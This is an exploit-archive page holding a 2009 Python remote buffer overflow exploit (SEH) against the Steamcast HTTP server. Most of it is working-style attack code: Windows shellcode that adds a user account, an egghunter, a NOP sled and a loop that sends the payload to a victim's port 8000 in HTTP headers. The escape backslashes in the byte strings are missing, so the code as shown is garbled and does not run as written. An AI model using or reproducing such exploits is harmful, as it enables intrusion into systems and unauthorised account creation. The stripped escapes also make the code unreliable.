Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
# Published : 2009-04-13
# Author : His0k4
# Previous Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
# Next Title : Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability

#!/usr/bin/python
#[*] Usage   : steamcast.py [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1] 
port = 8000


# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x44x7Ax32x37x44x7Ax32x37x29xc9x83xe9xcdxd9xeexd9"
"x74x24xf4x5bx81x73x13x05x16xf2x06x83xebxfcxe2xf4"
"xf9xfexb6x06x05x16x79x43x39x9dx8ex03x7dx17x1dx8d"
"x4ax0ex79x59x25x17x19x4fx8ex22x79x07xebx27x32x9f"
"xa9x92x32x72x02xd7x38x0bx04xd4x19xf2x3ex42xd6x02"
"x70xf3x79x59x21x17x19x60x8ex1axb9x8dx5ax0axf3xed"
"x8ex0ax79x07xeex9fxaex22x01xd5xc3xc6x61x9dxb2x36"
"x80xd6x8ax0ax8ex56xfex8dx75x0ax5fx8dx6dx1ex19x0f"
"x8ex96x42x06x05x16x79x6ex39x49xc3xf0x65x40x7bxfe"
"x86xd6x89x56x6dxe6x78x02x5ax7ex6axf8x8fx18xa5xf9"
"xe2x75x9fx62x2bx73x8ax63x25x39x91x26x6bx73x86x26"
"x70x65x97x74x25x72x88x26x37x21xd2x29x44x52xb6x26"
"x23x30xd2x68x60x62xd2x6ax6ax75x93x6ax62x64x9dx73"
"x75x36xb3x62x68x7fx9cx6fx76x62x80x67x71x79x80x75"
"x25x72x88x26x2ax57xb6x42x05x16xf2x06")

shellunt=(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7")


exploit = "x90"*(1003-len(shellcode)) + shellcode + "xEBx06x90x90" + "xDBx27x02x10" + "x90"*20 + shellunt

#It needs a loop to works
while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	head =  "GET / HTTP/1.1rn"
	head += "Host: "+host+"rn"
	head += exploit+"rn"
	head += "rnrn"

	s.send(head)

# www.Syue.com [2009-04-13]